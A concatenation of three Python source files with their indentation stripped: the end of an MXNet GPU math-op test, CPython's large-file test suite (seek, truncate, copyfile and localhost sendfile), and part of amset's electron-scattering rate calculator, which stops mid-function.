assert mx.context.num_gpus() > 0
def math_log(shape, dtype, check_value):
np_x = np.random.rand(*tuple(shape))
x = mx.nd.array(np_x, dtype=dtype)
y = mx.nd.log(data=x)
if check_value:
x_ = x.as_in_context(mx.cpu())
y_ = mx.nd.log(data=x_)
assert_almost_equal(y.asnumpy(), y_.asnumpy())
def math_erf(shape, dtype, check_value):
np_x = np.random.rand(*tuple(shape))
x = mx.nd.array(np_x, dtype=dtype)
y = mx.nd.erf(data=x)
if check_value:
x_ = x.as_in_context(mx.cpu())
y_ = mx.nd.erf(data=x_)
assert_almost_equal(y.asnumpy(), y_.asnumpy())
def math_square(shape, dtype, check_value):
np_x = np.random.rand(*tuple(shape))
x = mx.nd.array(np_x, dtype=dtype)
y = mx.nd.square(data=x)
if check_value:
x_ = x.as_in_context(mx.cpu())
y_ = mx.nd.square(data=x_)
assert_almost_equal(y.asnumpy(), y_.asnumpy())
def run_math(op, shape, dtype="float32", check_value=True):
run_num = 10
for i in range(run_num):
if op == 'log':
math_log(shape=shape, dtype=dtype, check_value=check_value)
elif op == 'erf':
math_erf(shape=shape, dtype=dtype, check_value=check_value)
elif op == 'square':
math_square(shape=shape, dtype=dtype, check_value=check_value)
@with_seed()
@pytest.mark.serial
def test_math():
ops = ['log', 'erf', 'square']
check_value= True
shape_lst = [[1000], [100,1000], [10,100,100], [10,100,100,100]]
dtypes = ["float32", "float64"]
for shape in shape_lst:
for dtype in dtypes:
for op in ops:
run_math(op, shape, dtype, check_value=check_value)
@with_seed()
@pytest.mark.serial
def test_arange_like_dtype():
dtypes = [np.float16, np.float32, np.float64]
for t in dtypes:
x = mx.sym.Variable('x', dtype=t)
y = mx.sym.reshape(x, shape=(0, 0, -1))
z = mx.sym.contrib.arange_like(y, axis=-1)
mod = z._simple_bind(ctx=mx.gpu(0), x=(3, 4, 5, 6), grad_req='null')
mod.arg_arrays[0][:] = np.random.normal(size=mod.arg_arrays[0].shape).astype(t)
out = mod.forward(is_train=False)
for v in out:
assert v.dtype == t
|
test_largefile.py
|
"""Test largefile support on system where this makes sense.
"""
import os
import stat
import sys
import unittest
import socket
import shutil
import threading
from test.support import TESTFN, requires, unlink, bigmemtest
from test.support import SHORT_TIMEOUT
from test.support import socket_helper
import io # C implementation of io
import _pyio as pyio # Python implementation of io
# size of file to create (>2 GiB; 2 GiB == 2,147,483,648 bytes)
size = 2_500_000_000
TESTFN2 = TESTFN + '2'
class LargeFileTest:
def setUp(self):
if os.path.exists(TESTFN):
mode = 'r+b'
else:
mode = 'w+b'
with self.open(TESTFN, mode) as f:
current_size = os.fstat(f.fileno())[stat.ST_SIZE]
if current_size == size+1:
return
if current_size == 0:
f.write(b'z')
f.seek(0)
f.seek(size)
f.write(b'a')
f.flush()
self.assertEqual(os.fstat(f.fileno())[stat.ST_SIZE], size+1)
@classmethod
def tearDownClass(cls):
with cls.open(TESTFN, 'wb'):
pass
if not os.stat(TESTFN)[stat.ST_SIZE] == 0:
raise cls.failureException('File was not truncated by opening '
'with mode "wb"')
unlink(TESTFN2)
class TestFileMethods(LargeFileTest):
"""Test that each file function works as expected for large
(i.e. > 2 GiB) files.
"""
# _pyio.FileIO.readall() uses a temporary bytearray then casted to bytes,
# so memuse=2 is needed
@bigmemtest(size=size, memuse=2, dry_run=False)
def test_large_read(self, _size):
# bpo-24658: Test that a read greater than 2GB does not fail.
with self.open(TESTFN, "rb") as f:
self.assertEqual(len(f.read()), size + 1)
self.assertEqual(f.tell(), size + 1)
def test_osstat(self):
self.assertEqual(os.stat(TESTFN)[stat.ST_SIZE], size+1)
def test_seek_read(self):
with self.open(TESTFN, 'rb') as f:
self.assertEqual(f.tell(), 0)
self.assertEqual(f.read(1), b'z')
self.assertEqual(f.tell(), 1)
f.seek(0)
self.assertEqual(f.tell(), 0)
f.seek(0, 0)
self.assertEqual(f.tell(), 0)
f.seek(42)
self.assertEqual(f.tell(), 42)
f.seek(42, 0)
self.assertEqual(f.tell(), 42)
f.seek(42, 1)
self.assertEqual(f.tell(), 84)
f.seek(0, 1)
self.assertEqual(f.tell(), 84)
f.seek(0, 2) # seek from the end
self.assertEqual(f.tell(), size + 1 + 0)
f.seek(-10, 2)
self.assertEqual(f.tell(), size + 1 - 10)
f.seek(-size-1, 2)
self.assertEqual(f.tell(), 0)
f.seek(size)
self.assertEqual(f.tell(), size)
# the 'a' that was written at the end of file above
self.assertEqual(f.read(1), b'a')
f.seek(-size-1, 1)
self.assertEqual(f.read(1), b'z')
self.assertEqual(f.tell(), 1)
def test_lseek(self):
with self.open(TESTFN, 'rb') as f:
self.assertEqual(os.lseek(f.fileno(), 0, 0), 0)
self.assertEqual(os.lseek(f.fileno(), 42, 0), 42)
self.assertEqual(os.lseek(f.fileno(), 42, 1), 84)
self.assertEqual(os.lseek(f.fileno(), 0, 1), 84)
self.assertEqual(os.lseek(f.fileno(), 0, 2), size+1+0)
self.assertEqual(os.lseek(f.fileno(), -10, 2), size+1-10)
self.assertEqual(os.lseek(f.fileno(), -size-1, 2), 0)
self.assertEqual(os.lseek(f.fileno(), size, 0), size)
# the 'a' that was written at the end of file above
self.assertEqual(f.read(1), b'a')
def test_truncate(self):
with self.open(TESTFN, 'r+b') as f:
if not hasattr(f, 'truncate'):
raise unittest.SkipTest("open().truncate() not available "
"on this system")
f.seek(0, 2)
# else we've lost track of the true size
self.assertEqual(f.tell(), size+1)
# Cut it back via seek + truncate with no argument.
newsize = size - 10
f.seek(newsize)
f.truncate()
self.assertEqual(f.tell(), newsize) # else pointer moved
f.seek(0, 2)
self.assertEqual(f.tell(), newsize) # else wasn't truncated
# Ensure that truncate(smaller than true size) shrinks
# the file.
newsize -= 1
f.seek(42)
f.truncate(newsize)
self.assertEqual(f.tell(), 42)
f.seek(0, 2)
self.assertEqual(f.tell(), newsize)
# XXX truncate(larger than true size) is ill-defined
# across platform; cut it waaaaay back
f.seek(0)
f.truncate(1)
self.assertEqual(f.tell(), 0) # else pointer moved
f.seek(0)
self.assertEqual(len(f.read()), 1) # else wasn't truncated
def test_seekable(self):
# Issue #5016; seekable() can return False when the current position
# is negative when truncated to an int.
for pos in (2**31-1, 2**31, 2**31+1):
with self.open(TESTFN, 'rb') as f:
f.seek(pos)
self.assertTrue(f.seekable())
def skip_no_disk_space(path, required):
def decorator(fun):
def wrapper(*args, **kwargs):
if shutil.disk_usage(os.path.realpath(path)).free < required:
hsize = int(required / 1024 / 1024)
raise unittest.SkipTest(
f"required {hsize} MiB of free disk space")
return fun(*args, **kwargs)
return wrapper
return decorator
class TestCopyfile(LargeFileTest, unittest.TestCase):
open = staticmethod(io.open)
# Exact required disk space would be (size * 2), but let's give it a
# bit more tolerance.
@skip_no_disk_space(TESTFN, size * 2.5)
def test_it(self):
# Internally shutil.copyfile() can use "fast copy" methods like
# os.sendfile().
size = os.path.getsize(TESTFN)
shutil.copyfile(TESTFN, TESTFN2)
self.assertEqual(os.path.getsize(TESTFN2), size)
with open(TESTFN2, 'rb') as f:
self.assertEqual(f.read(5), b'z\x00\x00\x00\x00')
f.seek(size - 5)
self.assertEqual(f.read(), b'\x00\x00\x00\x00a')
@unittest.skipIf(not hasattr(os, 'sendfile'), 'sendfile not supported')
class TestSocketSendfile(LargeFileTest, unittest.TestCase):
open = staticmethod(io.open)
timeout = SHORT_TIMEOUT
def setUp(self):
super().setUp()
self.thread = None
def tearDown(self):
super().tearDown()
if self.thread is not None:
self.thread.join(self.timeout)
self.thread = None
def tcp_server(self, sock):
def run(sock):
with sock:
conn, _ = sock.accept()
conn.settimeout(self.timeout)
with conn, open(TESTFN2, 'wb') as f:
event.wait(self.timeout)
while True:
chunk = conn.recv(65536)
if not chunk:
return
f.write(chunk)
event = threading.Event()
sock.settimeout(self.timeout)
self.thread = threading.Thread(target=run, args=(sock, ))
self.thread.start()
event.set()
# Exact required disk space would be (size * 2), but let's give it a
# bit more tolerance.
@skip_no_disk_space(TESTFN, size * 2.5)
def test_it(self):
port = socket_helper.find_unused_port()
with socket.create_server(("", port)) as sock:
self.tcp_server(sock)
with socket.create_connection(("127.0.0.1", port)) as client:
with open(TESTFN, 'rb') as f:
client.sendfile(f)
self.tearDown()
size = os.path.getsize(TESTFN)
self.assertEqual(os.path.getsize(TESTFN2), size)
with open(TESTFN2, 'rb') as f:
self.assertEqual(f.read(5), b'z\x00\x00\x00\x00')
f.seek(size - 5)
self.assertEqual(f.read(), b'\x00\x00\x00\x00a')
def setUpModule():
try:
import signal
# The default handler for SIGXFSZ is to abort the process.
# By ignoring it, system calls exceeding the file size resource
# limit will raise OSError instead of crashing the interpreter.
signal.signal(signal.SIGXFSZ, signal.SIG_IGN)
except (ImportError, AttributeError):
pass
# On Windows and Mac OSX this test consumes large resources; It
# takes a long time to build the >2 GiB file and takes >2 GiB of disk
# space therefore the resource must be enabled to run this test.
# If not, nothing after this line stanza will be executed.
if sys.platform[:3] == 'win' or sys.platform == 'darwin':
requires('largefile',
'test requires %s bytes and a long time to run' % str(size))
else:
# Only run if the current filesystem supports large files.
# (Skip this test on Windows, since we now always support
# large files.)
f = open(TESTFN, 'wb', buffering=0)
try:
# 2**31 == 2147483648
f.seek(2147483649)
# Seeking is not enough of a test: you must write and flush, too!
f.write(b'x')
f.flush()
except (OSError, OverflowError):
raise unittest.SkipTest("filesystem does not have "
"largefile support")
finally:
f.close()
unlink(TESTFN)
class CLargeFileTest(TestFileMethods, unittest.TestCase):
open = staticmethod(io.open)
class PyLargeFileTest(TestFileMethods, unittest.TestCase):
open = staticmethod(pyio.open)
def tearDownModule():
unlink(TESTFN)
unlink(TESTFN2)
if __name__ == '__main__':
unittest.main()
|
calculate.py
|
"""
This module implements methods to calculate electron scattering.
"""
import logging
import multiprocessing
import time
import traceback
from multiprocessing import cpu_count
from queue import Empty
from typing import Any, Dict, List, Optional, Union
import numba
import numpy as np
import quadpy
from pymatgen.electronic_structure.core import Spin
from pymatgen.util.coord import pbc_diff
from scipy.interpolate import griddata
from amset.constants import (
boltzmann_au,
defaults,
ev_to_hartree,
hbar,
small_val,
spin_name,
)
from amset.core.data import AmsetData
from amset.electronic_structure.fd import fd
from amset.electronic_structure.kpoints import kpoints_to_first_bz
from amset.electronic_structure.tetrahedron import (
TetrahedralBandStructure,
get_cross_section_values,
get_projected_intersections,
)
from amset.interpolation.momentum import MRTACalculator
from amset.interpolation.projections import ProjectionOverlapCalculator
from amset.interpolation.wavefunction import WavefunctionOverlapCalculator
from amset.log import log_list, log_time_taken
from amset.scattering.basic import AbstractBasicScattering
from amset.scattering.elastic import (
AbstractElasticScattering,
AcousticDeformationPotentialScattering,
)
from amset.scattering.inelastic import AbstractInelasticScattering
from amset.util import (
create_shared_dict_array,
dict_array_from_buffer,
get_progress_bar,
)
__author__ = "Alex Ganose"
__maintainer__ = "Alex Ganose"
__email__ = "aganose@lbl.gov"
logger = logging.getLogger(__name__)
_all_scatterers: Union = (
AbstractElasticScattering.__subclasses__()
+ AbstractInelasticScattering.__subclasses__()
+ AbstractBasicScattering.__subclasses__()
)
_scattering_mechanisms = {m.name: m for m in _all_scatterers}
basic_scatterers = [i.name for i in AbstractBasicScattering.__subclasses__()]
ni = {
"high": {
"triangle": quadpy.t2.schemes["xiao_gimbutas_50"](),
"quad": quadpy.c2.schemes["sommariva_55"](),
},
"medium": {
"triangle": quadpy.t2.schemes["xiao_gimbutas_06"](),
"quad": quadpy.c2.schemes["sommariva_06"](),
},
"low": {
"triangle": quadpy.t2.schemes["centroid"](),
"quad": quadpy.c2.schemes["dunavant_00"](),
},
}
# ni = {
# "high": {
# "triangle": quadpy.t2.schemes["centroid"](),
# "quad": quadpy.c2.schemes["dunavant_00"]()
# },
# "medium": {
# "triangle": quadpy.t2.schemes["centroid"](),
# "quad": quadpy.c2.schemes["dunavant_00"]()
# },
# "low": {
# "triangle": quadpy.t2.schemes["centroid"](),
# "quad": quadpy.c2.schemes["dunavant_00"]()
# },
# }
class ScatteringCalculator:
def __init__(
self,
settings: Dict[str, float],
amset_data: AmsetData,
cutoff_pad: float,
scattering_type: Union[str, List[str], float] = "auto",
nworkers: int = defaults["nworkers"],
progress_bar: bool = defaults["print_log"],
cache_wavefunction: bool = defaults["cache_wavefunction"],
):
if amset_data.temperatures is None or amset_data.doping is None:
raise RuntimeError(
"AmsetData doesn't contain doping levels or temperatures"
)
self.scattering_type = scattering_type
self.settings = settings
self.nworkers = nworkers if nworkers != -1 else cpu_count()
self.scatterers = self.get_scatterers(scattering_type, settings, amset_data)
self.amset_data = amset_data
self.progress_bar = progress_bar
self.cache_wavefunction = cache_wavefunction
buf = 0.05 * ev_to_hartree
if self.amset_data.fd_cutoffs:
self.scattering_energy_cutoffs = (
self.amset_data.fd_cutoffs[0] - buf,
self.amset_data.fd_cutoffs[1] + buf,
)
else:
self.scattering_energy_cutoffs = (
min(self.amset_data.dos.energies) - buf,
max(self.amset_data.dos.energies) + buf,
)
self._coeffs = None
self._coeffs_mapping = None
# if only basic scatterers then no need to cache overlaps
self._basic_only = (
len(self.elastic_scatterers) + len(self.inelastic_scatterers) == 0
)
if (
isinstance(self.amset_data.overlap_calculator, ProjectionOverlapCalculator)
and cache_wavefunction
):
logger.info(
"Caching wavefunction not supported with orbital projection "
"overlaps. Setting cache_wavefunction to False."
)
elif cache_wavefunction and not self._basic_only:
self._coeffs = {}
self._coeffs_mapping = {}
# precompute the coefficients we will need to for calculating overlaps
# could do this on the fly but caching will really speed things up.
# we need to interpolate as the wavefunction coefficients were calculated on
# a coarse mesh but we calculate the orbital overlap on a fine mesh.
tbs = self.amset_data.tetrahedral_band_structure
for spin in amset_data.spins:
spin_b_idxs = []
spin_k_idxs = []
for b_idx, b_energies in enumerate(self.amset_data.energies[spin]):
# find all k-points that fall inside Fermi cutoffs
k_idxs = np.where(
(b_energies > self.scattering_energy_cutoffs[0] - cutoff_pad)
& (b_energies < self.scattering_energy_cutoffs[1] + cutoff_pad)
)[0]
# find k-points connected to the k-points inside Fermi cutoffs
k_idxs = tbs.get_connected_kpoints(k_idxs)
spin_k_idxs.extend(k_idxs.tolist())
spin_b_idxs.extend([b_idx] * len(k_idxs))
# calculate the coefficients for all bands and k-point simultaneously
try:
self._coeffs[
spin
] = self.amset_data.overlap_calculator.get_coefficients(
spin, spin_b_idxs, self.amset_data.kpoints[spin_k_idxs]
)
# because we are only storing the coefficients for the
# band/k-points we want, we need a way of mapping from the original
# band/k-point indices to the reduced indices. I.e., it allows us to
# get the coefficients for band b_idx, and k-point k_idx using:
# self._coeffs[spin][self._coeffs_mapping[b_idx, k_idx]]
# use a default value of 100000 as this was it will throw an error
# if we don't precache the correct values
mapping = np.full_like(self.amset_data.energies[spin], 100000)
mapping[spin_b_idxs, spin_k_idxs] = np.arange(len(spin_b_idxs))
self._coeffs_mapping[spin] = mapping.astype(int)
except MemoryError:
logger.warning(
"Memory requirements too large to cache wavefunction "
"coefficients. Setting cache_wavefunction to False"
)
self._coeffs = None
self._coeffs_mapping = None
break
self.in_queue = None
self.out_queue = None
self.workers = None
self.initialize_workers()
def initialize_workers(self):
if self._basic_only:
return
logger.info(f"Forking {self.nworkers} processes to calculate scattering")
t0 = time.perf_counter()
if isinstance(self.amset_data.overlap_calculator, ProjectionOverlapCalculator):
overlap_type = "projection"
else:
overlap_type = "wavefunction"
if self._coeffs is None:
coeffs_buffer = None
coeffs_mapping_buffer = None
else:
coeffs_buffer, self._coeffs = create_shared_dict_array(
self._coeffs, return_shared_data=True
)
coeffs_mapping_buffer, self._coeffs_mapping = create_shared_dict_array(
self._coeffs_mapping, return_shared_data=True
)
amset_data_min = _AmsetDataMin.from_amset_data(self.amset_data)
amset_data_min_reference = amset_data_min.to_reference()
# deformation potential is a large tensor that should be put into shared memory
elastic_scatterers = [
s.to_reference()
if isinstance(s, AcousticDeformationPotentialScattering)
else s
for s in self.elastic_scatterers
]
ctx = multiprocessing.get_context("spawn")
self.in_queue = ctx.Queue()
self.out_queue = ctx.Queue()
args = (
self.amset_data.tetrahedral_band_structure.to_reference(),
overlap_type,
self.amset_data.overlap_calculator.to_reference(),
self.amset_data.mrta_calculator.to_reference(),
elastic_scatterers,
self.inelastic_scatterers,
amset_data_min_reference,
coeffs_buffer,
coeffs_mapping_buffer,
self.in_queue,
self.out_queue,
)
self.workers = []
for _ in range(self.nworkers):
self.workers.append(ctx.Process(target=scattering_worker, args=args))
iterable = self.workers
if self.progress_bar:
iterable = get_progress_bar(self.workers, desc="workers")
for w in iterable:
w.start()
log_time_taken(t0)
return self.workers
def terminate_workers(self):
# The "None"s at the end of the queue signals to the workers that there are
# no more jobs left and they must therefore exit.
if self.workers is not None:
for i in range(self.nworkers):
self.in_queue.put(None)
for w in self.workers:
w.terminate()
w.join(0)
self.in_queue.close()
self.out_queue.close()
self.workers = None
@property
def basic_scatterers(self):
return [s for s in self.scatterers if isinstance(s, AbstractBasicScattering)]
@property
def inelastic_scatterers(self):
return [
s for s in self.scatterers if isinstance(s, AbstractInelasticScattering)
]
@property
def elastic_scatterers(self):
return [s for s in self.scatterers if isinstance(s, AbstractElasticScattering)]
@property
def scatterer_labels(self):
basic_names = [s.name for s in self.basic_scatterers]
elastic_names = [s.name for s in self.elastic_scatterers]
inelastic_names = [s.name for s in self.inelastic_scatterers]
return basic_names + elastic_names + inelastic_names
@staticmethod
def get_scatterers(
scattering_type: Union[str, List[str], float],
settings: Dict[str, Any],
amset_data: AmsetData,
) -> List[Union[AbstractElasticScattering, AbstractInelasticScattering]]:
if scattering_type == "auto":
# dynamically determine the available scattering mechanism subclasses
logger.info(
"Examining material properties to determine possible scattering "
"mechanisms"
)
scattering_type = []
for name, mechanism in _scattering_mechanisms.items():
req_prop = mechanism.required_properties
if all([settings.get(x, None) is not None for x in req_prop]):
scattering_type.append(name)
if not scattering_type:
raise ValueError(
"No scattering mechanisms possible with material properties"
)
else:
for name in scattering_type:
missing_properties = [
p
for p in _scattering_mechanisms[name].required_properties
if settings.get(p, None) is None
]
if missing_properties:
str_missing = ", ".join(missing_properties)
raise ValueError(
"{} scattering mechanism specified but the following "
"material properties are missing: {}".format(name, str_missing)
)
str_scats = ", ".join(scattering_type)
logger.info(f"Scattering mechanisms to be calculated: {str_scats}")
return [
_scattering_mechanisms[name].from_amset_data(settings, amset_data)
for name in scattering_type
]
def calculate_scattering_rates(self):
spins = self.amset_data.spins
kpoints = self.amset_data.kpoints
energies = self.amset_data.energies
fermi_shape = self.amset_data.fermi_levels.shape
scattering_shape = (len(self.scatterer_labels),) + fermi_shape
rate_shape = {s: scattering_shape + energies[s].shape for s in spins}
# rates has shape (spin, nscatterers, ndoping, ntemp, nbands, nkpoints)
rates = {s: np.zeros(rate_shape[s]) for s in spins}
masks = {s: np.full(rate_shape[s], True) for s in spins}
logger.info("Scattering information:")
log_list([f"# ir k-points: {len(self.amset_data.ir_kpoints_idx)}"])
for spin in spins:
for b_idx in range(len(self.amset_data.energies[spin])):
str_b = "Calculating rates for {} band {}"
logger.info(str_b.format(spin_name[spin], b_idx + 1))
t0 = time.perf_counter()
(
rates[spin][..., b_idx, :],
masks[spin][..., b_idx, :],
) = self.calculate_band_rates(spin, b_idx)
info = [
f"max rate: {rates[spin][..., b_idx, :].max():.4g}",
f"min rate: {rates[spin][..., b_idx, :].min():.4g}",
]
log_list(info, level=logging.DEBUG)
log_list([f"time: {time.perf_counter() - t0:.4f} s"])
# fill in k-points outside Fermi-Dirac cutoffs with a default value
rates[spin][masks[spin]] = 1e14
# if the k-point density is low, some k-points may not have other k-points
# within the energy tolerance leading to zero rates
rates = _interpolate_zero_rates(
rates, kpoints, masks, progress_bar=self.progress_bar
)
# enforce symmetry of interpolated points
ir_idx = self.amset_data.ir_kpoints_idx
ir_to_full = self.amset_data.ir_to_full_kpoint_mapping
rates = {s: sr[..., ir_idx][..., ir_to_full] for s, sr in rates.items()}
self.terminate_workers()
return rates
def calculate_band_rates(self, spin: Spin, b_idx: int):
if self.workers is None and not self._basic_only:
self.initialize_workers()
vol = self.amset_data.structure.lattice.reciprocal_lattice.volume
conversion = vol / (4 * np.pi ** 2)
kpoints_idx = self.amset_data.ir_kpoints_idx
nkpoints = len(kpoints_idx)
band_energies = self.amset_data.energies[spin][b_idx, kpoints_idx]
mask = band_energies < self.scattering_energy_cutoffs[0]
mask |= band_energies > self.scattering_energy_cutoffs[1]
fill_mask = mask[self.amset_data.ir_to_full_kpoint_mapping]
n = np.sum(~fill_mask)
logger.info(f" ├── # k-points within Fermi–Dirac cut-offs: {n}")
k_idx_in_cutoff = kpoints_idx[~mask]
ir_idx_in_cutoff = np.arange(nkpoints)[~mask]
iterable = list(zip(k_idx_in_cutoff, ir_idx_in_cutoff))
to_stack = []
if len(self.basic_scatterers) > 0:
basic_rates = np.array(
[m.rates[spin][:, :, b_idx, kpoints_idx] for m in self.basic_scatterers]
)
to_stack.append(basic_rates)
if len(self.elastic_scatterers) > 0:
elastic_prefactors = conversion * np.array(
[m.prefactor(spin, b_idx) for m in self.elastic_scatterers]
)
elastic_rates = np.zeros(elastic_prefactors.shape + (nkpoints,))
if len(k_idx_in_cutoff) > 0:
if self.progress_bar:
pbar = get_progress_bar(total=len(iterable), desc="elastic")
else:
pbar = None
for k_idx, ir_idx in iterable:
self.in_queue.put((spin, b_idx, k_idx, False, ir_idx))
for _ in range(len(iterable)):
ir_idx, elastic_rates[..., ir_idx] = self._get_rate_from_queue()
if pbar:
pbar.update()
if pbar:
pbar.close()
elastic_rates *= elastic_prefactors[..., None]
to_stack.append(elastic_rates)
if len(self.inelastic_scatterers) > 0:
inelastic_prefactors = conversion * np.array(
[m.prefactor(spin, b_idx) for m in self.inelastic_scatterers]
)
inelastic_rates = np.zeros(inelastic_prefactors.shape + (nkpoints,))
f_pop = self.settings["pop_frequency"]
energy_diff = f_pop * 1e12 * 2 * np.pi * hbar * ev_to_hartree
if len(k_idx_in_cutoff) > 0:
if self.progress_bar:
pbar = get_progress_bar(total=len(iterable) * 2, desc="inelastic")
else:
pbar = None
inelastic_rates[:, :, :, ir_idx_in_cutoff] = 0
for k_idx, ir_idx in iterable:
for ediff in [energy_diff, -energy_diff]:
self.in_queue.put((spin, b_idx, k_idx, ediff, ir_idx))
for i in range(len(iterable) * 2):
ir_idx, rate = self._get_rate_from_queue()
inelastic_rates[..., ir_idx] += rate
if pbar:
pbar.update()
if pbar:
pbar.close()
inelastic_rates *= inelastic_prefactors[..., None]
to_stack.append(inelastic_rates)
all_band_rates = np.vstack(to_stack)
return all_band_rates[..., self.amset_data.ir_to_full_kpoint_mapping], fill_mask
def _get_rate_from_queue(self):
# handle exception gracefully to avoid hanging processes
try:
result = self.out_queue.get(timeout=10)
except Empty:
# didn't receive anything for 10 seconds; this could be OK or it could
# the processes have been killed
if not self._workers_alive():
self.terminate_workers()
raise MemoryError(
"Some subprocessess were killed unexpectedly. Could be OOM "
"Killer?\nTry reducing nworkers."
)
else:
return self._get_rate_from_queue()
if isinstance(result[0], Exception):
logger.error(
"Scattering process ended with error:\n{}\nexiting".format(
str(result[1])
)
)
self.terminate_workers()
raise result[0]
return result
def _workers_alive(self):
return all([worker.is_alive() for worker in self.workers])
def scattering_worker(
tbs_reference,
overlap_type,
overlap_calculator_reference,
mrta_calculator_reference,
elastic_scatterers,
inelastic_scatterers,
amset_data_min_reference,
coeffs_buffer,
coeffs_mapping_buffer,
in_queue,
out_queue,
):
try:
tbs = TetrahedralBandStructure.from_reference(*tbs_reference)
mrta_calculator = MRTACalculator.from_reference(*mrta_calculator_reference)
amset_data_min = _AmsetDataMin.from_reference(*amset_data_min_reference)
if coeffs_buffer is None:
coeffs = None
coeffs_mapping = None
else:
coeffs = dict_array_from_buffer(coeffs_buffer)
coeffs_mapping = dict_array_from_buffer(coeffs_mapping_buffer)
if overlap_type == "wavefunction":
overlap_calculator = WavefunctionOverlapCalculator.from_reference(
*overlap_calculator_reference
)
elif overlap_type == "projection":
overlap_calculator = ProjectionOverlapCalculator.from_reference(
*overlap_calculator_reference
)
else:
raise ValueError(f"Unrecognised overlap type: {overlap_type}")
elastic_scatterers = [
AcousticDeformationPotentialScattering.from_reference(*s)
if isinstance(s, tuple)
else s
for s in elastic_scatterers
]
with np.errstate(all="ignore"):
while True:
job = in_queue.get()
if job is None:
break
spin, b_idx, k_idx, energy_diff, ir_k_idx = job
rate = calculate_rate(
tbs,
overlap_calculator,
mrta_calculator,
elastic_scatterers,
inelastic_scatterers,
amset_data_min,
coeffs,
coeffs_mapping,
spin,
b_idx,
k_idx,
energy_diff=energy_diff,
)
out_queue.put((ir_k_idx, rate))
except BaseException as e:
error_msg = traceback.format_exc()
out_queue.put((e, error_msg))
class _AmsetDataMin:
def __init__(self, structure, kpoint_mesh, velocities, fermi_levels, temperatures):
self.structure = structure
self.kpoint_mesh = kpoint_mesh
self.velocities = velocities
self.fermi_levels = fermi_levels
self.temperatures = temperatures
def to_reference(self):
velocities_buffer, self.velocities = create_shared_dict_array(
self.velocities, return_shared_data=True
)
return (
self.structure,
self.kpoint_mesh,
velocities_buffer,
self.fermi_levels,
self.temperatures,
)
@classmethod
def from_reference(
cls, structure, kpoint_mesh, velocities_buffer, fermi_levels, temperatures
):
return cls(
structure,
kpoint_mesh,
dict_array_from_buffer(velocities_buffer),
fermi_levels,
temperatures,
)
@classmethod
def from_amset_data(cls, amset_data):
return cls(
amset_data.structure,
amset_data.kpoint_mesh,
amset_data.velocities,
amset_data.fermi_levels,
amset_data.temperatures,
)
def calculate_rate(
tbs: TetrahedralBandStructure,
overlap_calculator,
mrta_calculator,
elastic_scatterers,
inelastic_scatterers,
amset_data_min: _AmsetDataMin,
coeffs,
coeffs_mapping,
spin,
b_idx,
k_idx,
energy_diff=None,
):
rlat = amset_data_min.structure.lattice.reciprocal_lattice.matrix
velocity = amset_data_min.velocities[spin][b_idx, k_idx]
energy = tbs.energies[spin][b_idx, k_idx]
if energy_diff:
energy += energy_diff
(
tet_dos,
tet_mask,
cs_weights,
tet_contributions,
) = tbs.get_tetrahedra_density_of_states(
spin,
energy,
return_contributions=True,
symmetry_reduce=False,
# band_idx=b_idx, # turn this on to disable interband scattering
)
if len(tet_dos) == 0:
return 0
# next, get k-point indices and band_indices
property_mask, band_kpoint_mask, band_mask, kpoint_mask = tbs.get_masks(
spin, tet_mask
)
k = tbs.kpoints[k_idx]
k_primes = tbs.kpoints[kpoint_mask]
if coeffs is not None:
# use cached coefficients to calculate the overlap on the fine mesh
# tetrahedron vertices
spin_coeffs = coeffs[spin]
spin_coeffs_mapping = coeffs_mapping[spin]
if len(spin_coeffs.shape) == 3:
# ncl
overlap = _get_overlap_ncl(
spin_coeffs, spin_coeffs_mapping, b_idx, k_idx, band_mask, kpoint_mask
)
else:
overlap = _get_overlap(
spin_coeffs, spin_coeffs_mapping, b_idx, k_idx, band_mask, kpoint_mask
)
else:
overlap = overlap_calculator.get_overlap(spin, b_idx, k, band_mask, k_primes)
# put overlap back in array with shape (nbands, nkpoints)
all_overlap = np.zeros(tbs.energies[spin].shape)
all_overlap[band_kpoint_mask] = overlap
# now select the properties at the tetrahedron vertices
vert_overlap = all_overlap[property_mask]
# get interpolated overlap at centre of tetrahedra cross sections
tet_overlap = get_cross_section_values(vert_overlap, *tet_contributions)
tetrahedra = tbs.tetrahedra[spin][tet_mask]
# have to deal with the case where the tetrahedron cross section crosses the
# zone boundary. This is a slight inaccuracy but we just treat the
# cross section as if it is on one side of the boundary
tet_kpoints = tbs.kpoints[tetrahedra]
base_kpoints = tet_kpoints[:, 0][:, None, :]
k_diff = pbc_diff(tet_kpoints, base_kpoints) + pbc_diff(base_kpoints, k)
# project the tetrahedron cross sections onto 2D surfaces in either a triangle
# or quadrilateral
k_diff = np.dot(k_diff, rlat)
intersections = get_cross_section_values(k_diff, *tet_contributions, average=False)
projected_intersections, basis = get_projected_intersections(intersections)
k_spacing = np.linalg.norm(np.dot(rlat, 1 / amset_data_min.kpoint_mesh))
qpoints, weights, mapping = get_fine_mesh_qpoints(
projected_intersections,
basis,
*tet_contributions[0:3],
high_tol=k_spacing * 0.5,
med_tol=k_spacing * 2,
cross_section_weights=cs_weights,
)
qpoint_norm_sq = np.sum(qpoints ** 2, axis=-1)
k_primes = np.dot(qpoints, np.linalg.inv(rlat)) + k
k_primes = kpoints_to_first_bz(k_primes)
# unit q in reciprocal cartesian coordinates
unit_q = qpoints / np.sqrt(qpoint_norm_sq)[:, None]
if energy_diff:
e_fd = _get_fd(energy, amset_data_min.fermi_levels, amset_data_min.temperatures)
emission = energy_diff <= 0
rates = [
s.factor(unit_q, qpoint_norm_sq, emission, e_fd)
for s in inelastic_scatterers
]
mrta_factor = 1
else:
mrta_factor = mrta_calculator.get_mrta_factor(
spin, b_idx, k, tet_mask[0][mapping], k_primes
)
rates = [
s.factor(unit_q, qpoint_norm_sq, spin, b_idx, k, velocity)
for s in elastic_scatterers
]
rates = np.array(rates)
rates /= amset_data_min.structure.lattice.reciprocal_lattice.volume
rates *= tet_overlap[mapping] * weights * mrta_factor
# this is too expensive vs tetrahedron integration and doesn't add much more
# accuracy; could offer this as an option
# overlap = self.amset_data.overlap_calculator.get_overlap(
# spin, b_idx, k, tet_mask[0][mapping], k_primes
# )
# rates *= overlap * weights * mrta_factor
# sometimes the projected intersections can be nan when the density of states
# contribution is infinitesimally small; this catches those errors
rates[np.isnan(rates)] = 0
return np.sum(rates, axis=-1)
@numba.njit
def _get_overlap(
spin_coeffs, spin_coeffs_mapping, b_idx, k_idx, band_mask, kpoint_mask
):
res = np.zeros(band_mask.shape[0])
initial = np.conj(spin_coeffs[spin_coeffs_mapping[b_idx, k_idx]])
for i in range(band_mask.shape[0]):
final = spin_coeffs[spin_coeffs_mapping[band_mask[i], kpoint_mask[i]]]
